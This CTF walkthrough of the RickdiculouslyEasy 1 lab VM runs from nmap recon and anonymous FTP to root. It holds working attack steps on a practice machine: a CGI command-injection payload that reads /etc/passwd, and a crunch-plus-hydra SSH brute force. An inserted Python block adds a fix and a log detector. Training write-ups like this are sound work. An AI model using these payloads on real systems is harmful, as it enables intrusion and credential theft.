Amonsec


RickdiculouslyEasy 1: CTF walkthrough

Introduction

Name: RickdiculouslyEasy: 1
Release date: 21 Sep 2017

Author: Luke
Series: RickdiculouslyEasy

 

Reconnaissance

We scan our local network to find the IP address of the vulnerable system.

rickdiculouslyeasy_1_ctf_walkthrough_arp_scan.png

Next, we use nmap to find all open ports and the services behind them.

root@kali:~/Desktop# nmap -A -O -p- -T5 --reason 192.168.1.45

Starting Nmap 7.60 ( https://nmap.org ) at 2017-10-14 17:53 CEST
Warning: 192.168.1.45 giving up on port because retransmission cap hit (2).
Stats: 0:02:38 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 94.59% done; ETC: 17:56 (0:00:09 remaining)
Nmap scan report for pc-246.home (192.168.1.45)
Host is up, received arp-response (0.011s latency).
Not shown: 65455 closed ports, 73 filtered ports
Reason: 65455 resets and 73 no-responses
PORT      STATE SERVICE REASON         VERSION
21/tcp    open  ftp     syn-ack ttl 64 vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| -rw-r--r--    1 0        0              42 Aug 22 05:10 FLAG.txt
|_drwxr-xr-x    2 0        0               6 Feb 12  2017 pub
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to ::ffff:192.168.1.107
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 4
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp    open  ssh?    syn-ack ttl 64
| fingerprint-strings: 
|   NULL: 
|_    Welcome to Ubuntu 14.04.5 LTS (GNU/Linux 4.4.0-31-generic x86_64)
80/tcp    open  http    syn-ack ttl 64 Apache httpd 2.4.27 ((Fedora))
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Apache/2.4.27 (Fedora)
|_http-title: Morty's Website
9090/tcp  open  http    syn-ack ttl 64 Cockpit web service
|_http-title: Did not follow redirect to https://pc-246.home:9090/
13337/tcp open  unknown syn-ack ttl 64
| fingerprint-strings: 
|   NULL: 
|_    FLAG:{TheyFoundMyBackDoorMorty}-10Points
22222/tcp open  ssh     syn-ack ttl 64 OpenSSH 7.5 (protocol 2.0)
| ssh-hostkey: 
|   2048 b4:11:56:7f:c0:36:96:7c:d0:99:dd:53:95:22:97:4f (RSA)
|   256 20:67:ed:d9:39:88:f9:ed:0d:af:8c:8e:8a:45:6e:0e (ECDSA)
|_  256 a6:84:fa:0f:df:e0:dc:e2:9a:2d:e7:13:3c:e7:50:a9 (EdDSA)
60000/tcp open  unknown syn-ack ttl 64
| fingerprint-strings: 
|   NULL, ibm-db2: 
|_    Welcome to Ricks half baked reverse shell...
3 services unrecognized despite returning data. If you know the service/version, please submit the following fingerprints at https://nmap.org/cgi-bin/submit.cgi?new-service :
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port22-TCP:V=7.60%I=7%D=10/14%Time=59E233EA%P=x86_64-pc-linux-gnu%r(NUL
SF:L,42,"Welcome\x20to\x20Ubuntu\x2014\.04\.5\x20LTS\x20\(GNU/Linux\x204\.
SF:4\.0-31-generic\x20x86_64\)\n");
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port13337-TCP:V=7.60%I=7%D=10/14%Time=59E233EA%P=x86_64-pc-linux-gnu%r(
SF:NULL,29,"FLAG:{TheyFoundMyBackDoorMorty}-10Points\n");
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port60000-TCP:V=7.60%I=7%D=10/14%Time=59E233F0%P=x86_64-pc-linux-gnu%r(
SF:NULL,2F,"Welcome\x20to\x20Ricks\x20half\x20baked\x20reverse\x20shell\.\
SF:.\.\n#\x20")%r(ibm-db2,2F,"Welcome\x20to\x20Ricks\x20half\x20baked\x20r
SF:everse\x20shell\.\.\.\n#\x20");
MAC Address: 24:0A:64:9E:6E:74 (AzureWave Technology)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.8
Network Distance: 1 hop
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT      ADDRESS
1   11.19 ms pc-246.home (192.168.1.45)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 266.46 seconds
root@kali:~/Desktop#
 

FTP service

An FTP service is running and apparently it does not require credentials: anonymous login is allowed.

rickdiculouslyeasy_1_ctf_walkthrough_ftp_service.png

Note, the pub directory is empty.

First flag: FLAG{Whoa this is unexpected} – 10 Points

10 out of 130.

 

Cockpit web service

An HTTP service (Cockpit) is listening on an uncommon port, 9090; let's check this one.

rickdiculouslyeasy_1_ctf_walkthrough_cockpit_web_server.png

Second flag: FLAG {There is no Zeus, in your face!} – 10 Points

20 out of 130.

 

Unknown port 13337

We found an open port with an unknown service; let's try to connect to it.

root@kali:~/Desktop# nc -nvv 192.168.1.45 13337
(UNKNOWN) [192.168.1.45] 13337 (?) open
FLAG:{TheyFoundMyBackDoorMorty}-10Points
 sent 0, rcvd 41
root@kali:~/Desktop#

No more, no less.

Third flag: FLAG:{TheyFoundMyBackDoorMorty}-10Points

30 out of 130.

 

Unknown port 60000

A reverse shell publicly accessible? Interesting.

root@kali:~/Desktop# nc -nvv 192.168.1.45 60000
(UNKNOWN) [192.168.1.45] 60000 (?) open
Welcome to Ricks half baked reverse shell...
# ls
FLAG.txt 
# cat FLAG.txt    
FLAG{Flip the pickle Morty!} - 10 Points 
#

It's a shell with a highly restrictive environment; only a few commands are usable, such as ls, cat or whoami.

Fourth flag: FLAG{Flip the pickle Morty!} – 10 Points

40 out of 130.

 

‘Main’ website

OK, this time we have a real website. First, the robots.txt file gives us really interesting information about the /cgi-bin/ directory: two tools seem to be usable.

root@kali:~/Desktop# curl http://192.168.1.45/robots.txt
They're Robots Morty! It's ok to shoot them! They're just Robots!

/cgi-bin/root_shell.cgi
/cgi-bin/tracertool.cgi
/cgi-bin/*
root@kali:~/Desktop#

Then, gobuster can be used to find a directory called passwords.

Let’s see what we can find in this directory.

root@kali:~/Desktop# curl http://192.168.1.45/passwords/FLAG.txt
FLAG{Yeah d- just don't do it.} - 10 Points
root@kali:~/Desktop#

Moreover, we can find a password hidden in an HTML comment in the page source.

root@kali:~/Desktop# curl http://192.168.1.45/passwords/passwords.html
<!DOCTYPE html>
<html>
<head>
<title>Morty's Website</title>
<body>Wow Morty real clever. Storing passwords in a file called passwords.html? You've really done it this time Morty. Let me at least hide them.. I'd delete them entirely but I know you'd go bitching to your mom. That's the last thing I need.</body>
<!--Password: winter-->
</head>
</html>
root@kali:~/Desktop#

Fifth flag: FLAG{Yeah d- just don’t do it.} – 10 Points

Our next step is the /cgi-bin directory. The first script, root_shell.cgi, is a waste of time, but the second one allows us to run the tracert command via an HTML form.

The ip parameter of this tool is not sanitized, so we can easily find a command injection vulnerability that allows us to execute commands remotely on the server.

rickdiculouslyeasy_1_ctf_walkthrough_tracertool_rce.png

Let's enumerate the system and read files.

We will see that the cat command is unusable. Fortunately for us, other commands can be used to read the content of a file, such as less or more. Because less is more, let's try to read the /etc/passwd file with the less command.

root@kali:/var/www/html# curl "http://192.168.1.45/cgi-bin/tracertool.cgi?ip=127.0.0.1%3Bless+%2Fetc%2Fpasswd"
[..snip..]
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
systemd-coredump:x:999:998:systemd Core Dumper:/:/sbin/nologin
systemd-timesync:x:998:997:systemd Time Synchronization:/:/sbin/nologin
systemd-network:x:192:192:systemd Network Management:/:/sbin/nologin
systemd-resolve:x:193:193:systemd Resolver:/:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
polkitd:x:997:996:User for polkitd:/:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
rpc:x:32:32:Rpcbind Daemon:/var/lib/rpcbind:/sbin/nologin
abrt:x:173:173::/etc/abrt:/sbin/nologin
cockpit-ws:x:996:994:User for cockpit-ws:/:/sbin/nologin
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
chrony:x:995:993::/var/lib/chrony:/sbin/nologin
tcpdump:x:72:72::/:/sbin/nologin
RickSanchez:x:1000:1000::/home/RickSanchez:/bin/bash
Morty:x:1001:1001::/home/Morty:/bin/bash
Summer:x:1002:1002::/home/Summer:/bin/bash
apache:x:48:48:Apache:/usr/share/httpd:/sbin/nologin
[..snip..]
root@kali:/var/www/html#
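To make the injection above concrete from the defender's side, here is an added Python example (not code from the original post, the CTF VM or tracertool.cgi itself): a hypothetical reconstruction of the vulnerable pattern next to a hardened allow-list version, plus a check that flags the same payload in constructed Apache access-log lines.

```python
import ipaddress
import re
from urllib.parse import unquote_plus

# Hypothetical reconstruction of the bug: the "ip" query parameter is pasted
# into a shell command string, so "127.0.0.1;less /etc/passwd" becomes two
# commands when the string is handed to /bin/sh.
def build_command_vulnerable(ip):
    return "traceroute " + ip


# Hardened form: accept only a value that parses as an IP address and build
# an argv list, so the value is never interpreted by a shell.
def validate_target(ip):
    try:
        ipaddress.ip_address(ip.strip())
        return True
    except ValueError:
        return False


def build_command_safe(ip):
    if not validate_target(ip):
        raise ValueError("ip parameter must be a single IPv4/IPv6 address")
    return ["traceroute", "-n", ip.strip()]   # pass to subprocess.run(argv), never shell=True


# Detection over Apache access-log lines: flag /cgi-bin/ requests whose
# decoded query string carries shell metacharacters.
REQUEST_RE = re.compile(r'"[A-Z]+ (\S+) HTTP/')
SHELL_META = re.compile(r"[;|&`$\n]")


def find_injection_attempts(log_lines):
    hits = []
    for line in log_lines:
        m = REQUEST_RE.search(line)
        if not m:
            continue
        path, _, query = m.group(1).partition("?")
        decoded = unquote_plus(query)
        if path.startswith("/cgi-bin/") and SHELL_META.search(decoded):
            hits.append(path + "?" + decoded)
    return hits


# Constructed sample log lines (not taken from the target machine).
SAMPLE_LOG = [
    '192.168.1.107 - - [14/Oct/2017:18:10:01 +0200] "GET /cgi-bin/tracertool.cgi?ip=127.0.0.1 HTTP/1.1" 200 1432 "-" "curl/7.55.1"',
    '192.168.1.107 - - [14/Oct/2017:18:10:07 +0200] "GET /cgi-bin/tracertool.cgi?ip=127.0.0.1%3Bless+%2Fetc%2Fpasswd HTTP/1.1" 200 2960 "-" "curl/7.55.1"',
    '192.168.1.107 - - [14/Oct/2017:18:10:15 +0200] "GET /passwords/passwords.html HTTP/1.1" 200 413 "-" "curl/7.55.1"',
]

if __name__ == "__main__":
    for hit in find_injection_attempts(SAMPLE_LOG):
        print("command injection attempt:", hit)
```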

We have three regular users: RickSanchez, Morty and Summer.

Let's try the previously found password (winter) with each one.

root@kali:/var/www/html# ssh Summer@192.168.1.45 -p 22222
Summer@192.168.1.45's password: 
Last login: Wed Aug 23 19:20:29 2017 from 192.168.56.104
[Summer@pc-246 ~]$ id
uid=1002(Summer) gid=1002(Summer) groups=1002(Summer) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
[Summer@pc-246 ~]$ ls -lah
total 20K
drwx------. 2 Summer Summer  99 Sep 15 11:49 .
drwxr-xr-x. 5 root   root    52 Aug 18 18:20 ..
-rw-------. 1 Summer Summer   1 Sep 15 11:51 .bash_history
-rw-r--r--. 1 Summer Summer  18 May 30 14:53 .bash_logout
-rw-r--r--. 1 Summer Summer 193 May 30 14:53 .bash_profile
-rw-r--r--. 1 Summer Summer 231 May 30 14:53 .bashrc
-rw-rw-r--. 1 Summer Summer  48 Aug 22 02:46 FLAG.txt
[Summer@pc-246 ~]$ cat FLAG.txt
                         _
                        | \
                        | |
                        | |
   |\                   | |
  /, ~\                / /
 X     `-.....-------./ /
  ~-. ~  ~              |
     \             /    |
      \  /_     ___\   /
      | /\ ~~~~~   \  |
      | | \        || |
      | |\ \       || )
     (_/ (_/      ((_/

[Summer@pc-246 ~]$ more FLAG.txt 
FLAG{Get off the high road Summer!} - 10 Points
[Summer@pc-246 ~]$

Sixth flag: FLAG{Get off the high road Summer!} – 10 Points

60 out of 130.

 

Morty home folder

We are in the system and we know of three users; let's look at Morty's home directory.

[Summer@pc-246 Morty]$ ls -la
total 64
drwxr-xr-x. 2 Morty Morty   131 Sep 15 11:49 .
drwxr-xr-x. 5 root  root     52 Aug 18 18:20 ..
-rw-------. 1 Morty Morty     1 Sep 15 11:51 .bash_history
-rw-r--r--. 1 Morty Morty    18 May 30 14:53 .bash_logout
-rw-r--r--. 1 Morty Morty   193 May 30 14:53 .bash_profile
-rw-r--r--. 1 Morty Morty   231 May 30 14:53 .bashrc
-rw-r--r--. 1 root  root    414 Aug 22 03:06 journal.txt.zip
-rw-r--r--. 1 root  root  43145 Aug 22 03:04 Safe_Password.jpg
[Summer@pc-246 Morty]$

We have a password-protected zip file and, apparently, a safe password stored in a JPG file.

Actually, not really safe or protected.

rickdiculouslyeasy_1_ctf_walkthrough_safe_password_jpg_head.png

The password is: Meeseek.

We are now able to unzip the file.

[Summer@pc-246 Morty]$ unzip journal.txt.zip -d /tmp/
Archive:  journal.txt.zip
[journal.txt.zip] journal.txt password: 
  inflating: /tmp/journal.txt        
[Summer@pc-246 Morty]$ more /tmp/journal.txt 
Monday: So today Rick told me huge secret. He had finished his flask and was on to commercial grade pain
t solvent. He spluttered something about a safe, and a password. Or maybe it was a safe password... Was 
a password that was safe? Or a password to a safe? Or a safe password to a safe?

Anyway. Here it is:

FLAG: {131333} - 20 Points 
[Summer@pc-246 Morty]$

Seventh flag: FLAG: {131333} – 20 Points

80 out of 130.

 

Rick home folder

The content of Rick's home folder:

[Summer@pc-246 RickSanchez]$ ls -lahR
.:
total 12K
drwxr-xr-x. 4 RickSanchez RickSanchez 113 Sep 21 10:30 .
drwxr-xr-x. 5 root        root         52 Aug 18 18:20 ..
-rw-r--r--. 1 RickSanchez RickSanchez  18 May 30 14:53 .bash_logout
-rw-r--r--. 1 RickSanchez RickSanchez 193 May 30 14:53 .bash_profile
-rw-r--r--. 1 RickSanchez RickSanchez 231 May 30 14:53 .bashrc
drwxr-xr-x. 2 RickSanchez RickSanchez  18 Sep 21 09:50 RICKS_SAFE
drwxrwxr-x. 2 RickSanchez RickSanchez  26 Aug 18 20:26 ThisDoesntContainAnyFlags

./RICKS_SAFE:
total 12K
drwxr-xr-x. 2 RickSanchez RickSanchez   18 Sep 21 09:50 .
drwxr-xr-x. 4 RickSanchez RickSanchez  113 Sep 21 10:30 ..
-rwxr--r--. 1 RickSanchez RickSanchez 8.5K Sep 21 10:24 safe

./ThisDoesntContainAnyFlags:
total 4.0K
drwxrwxr-x. 2 RickSanchez RickSanchez  26 Aug 18 20:26 .
drwxr-xr-x. 4 RickSanchez RickSanchez 113 Sep 21 10:30 ..
-rw-rw-r--. 1 RickSanchez RickSanchez  95 Aug 18 20:26 NotAFlag.txt
[Summer@pc-246 RickSanchez]$

As we can see, we have an ELF binary called safe.

Let's copy this binary to my Kali machine.

[Summer@pc-246 RickSanchez]$ exit
logout
Connection to 192.168.1.45 closed.
root@kali:~/Desktop# 
root@kali:~/Desktop# scp -P22222 Summer@192.168.1.45:/home/RickSanchez/RICKS_SAFE/safe .
Summer@192.168.1.45's password: 
safe                                                                  100% 8704   845.6KB/s   00:00    
root@kali:~/Desktop#

We execute the binary, and apparently it needs a command-line argument.

root@kali:~/Desktop# ./safe 
Past Rick to present Rick, tell future Rick to use GOD DAMN COMMAND LINE AAAAAHHAHAGGGGRRGUMENTS!
root@kali:~/Desktop#

Let’s try with the previously found hint.

root@kali:~/Desktop# ./safe 131333
decrypt:     FLAG{And Awwwaaaaayyyy we Go!} - 20 Points

Ricks password hints:
 (This is incase I forget.. I just hope I don't forget how to write a script to generate potential passwords. Also, sudo is wheely good.)
Follow these clues, in order


1 uppercase character
1 digit
One of the words in my old bands name.�    @
root@kali:~/Desktop#

Now, we have to find Rick's password.

Eighth flag: FLAG{And Awwwaaaaayyyy we Go!} – 20 Points

100 out of 130.

 

Rick’s password

One of the best tools installed on Kali Linux for password generation is crunch. This is the tool that I will use for Rick's password.
So, following the hints in order, we need one uppercase character, one digit and one word of the old band's name.

  • If, like me, you didn't watch the series, you can find the band name here: http://rickandmorty.wikia.com/wiki/The_Flesh_Curtains

According to crunch's man page, we can specify the desired pattern as well as the minimum and maximum length.

DESCRIPTION
       Crunch  can  create  a  wordlist based on criteria you specify.  The output from crunch can be
       sent to the screen, file, or to another program.  The required parameters are:

       min-len
              The minimum length string you want crunch to start at.  This option  is  required  even
              for parameters that won't use the value.

       max-len
              The  maximum length string you want crunch to end at.  This option is required even for
              parameters that won't use the value.

       charset string

[..snip..]

        -t @,%^
              Specifies  a  pattern,  eg:  @@god@@@@  where  the only the @'s, ,'s, %'s, and ^'s will
              change.
              @ will insert lower case characters
              , will insert upper case characters
              % will insert numbers
              ^ will insert symbols

We can generate two dictionaries, one with the word Flesh and another with the word Curtains.

root@kali:~/Desktop# crunch 7 7 -t ,%Flesh -o flesh.txt
Crunch will now generate the following amount of data: 2080 bytes
0 MB
0 GB
0 TB
0 PB
Crunch will now generate the following number of lines: 260 

crunch: 100% completed generating output
root@kali:~/Desktop# crunch 10 10 -t ,%Curtains -o curtains.txt
Crunch will now generate the following amount of data: 2860 bytes
0 MB
0 GB
0 TB
0 PB
Crunch will now generate the following number of lines: 260 

crunch: 100% completed generating output
root@kali:~/Desktop#

Finally, we can use hydra for a dictionary attack on the SSH service with the merged wordlist.

root@kali:~/Desktop# hydra -l RickSanchez -P merged.txt ssh://192.168.1.45 -s 22222
Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (http://www.thc.org/thc-hydra) starting at 2017-10-14 22:40:42
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 780 login tries (l:1/p:780), ~49 tries per task
[DATA] attacking ssh://192.168.1.45:22222/
[22222][ssh] host: 192.168.1.45   login: RickSanchez   password: P7Curtains
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 1 final worker threads did not complete until end.
[ERROR] 1 target did not resolve or could not be connected
[ERROR] 16 targets did not complete
Hydra (http://www.thc.org/thc-hydra) finished at 2017-10-14 22:41:18
root@kali:~/Desktop#

Fortunately for us, the merged file (both generated dictionaries) contains only 780 entries, and in less than a minute we find Rick's password.

 

Last Flag

For this last flag, we don't need a tricky hack or a complex exploit. Always think of the basics first.

Rick is a super user (remember the hint "sudo is wheely good"), so we only need to switch to root with the sudo command.

root@kali:~/Desktop# ssh RickSanchez@192.168.1.45 -p 22222
RickSanchez@192.168.1.45's password: 
Last login: Sun Oct 15 07:44:36 2017 from 192.168.1.107
[RickSanchez@pc-246 ~]$ sudo su
[sudo] password for RickSanchez: 
[root@pc-246 RickSanchez]# 
[root@pc-246 RickSanchez]# more /root/FLAG.txt 
FLAG: {Ionic Defibrillator} - 30 points
[root@pc-246 RickSanchez]#

In a few seconds we have root access to the system and the last flag.

Ninth flag: FLAG: {Ionic Defibrillator} – 30 points

rickdiculouslyeasy_1_ctf_walkthrough_rick_sudo_root.png